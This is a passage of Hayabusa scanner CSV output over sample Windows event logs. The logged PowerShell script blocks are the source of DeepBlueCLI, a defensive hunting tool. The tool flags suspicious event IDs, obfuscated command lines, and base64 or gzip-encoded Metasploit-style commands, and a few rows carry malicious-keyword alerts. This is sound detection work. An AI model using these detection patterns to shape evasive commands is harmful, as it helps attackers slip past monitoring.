"".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many 
failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. 
$servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message 
is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. 
# This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:56:34.482 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:56:34.485 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} 
""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:58:22.516 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:58:22.516 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:58:22.517 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. 
# $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! 
characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:58:22.518 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. 
Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:58:28.692 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:59:30.619 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:59:31.969 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:59:31.974 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:59:31.974 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent 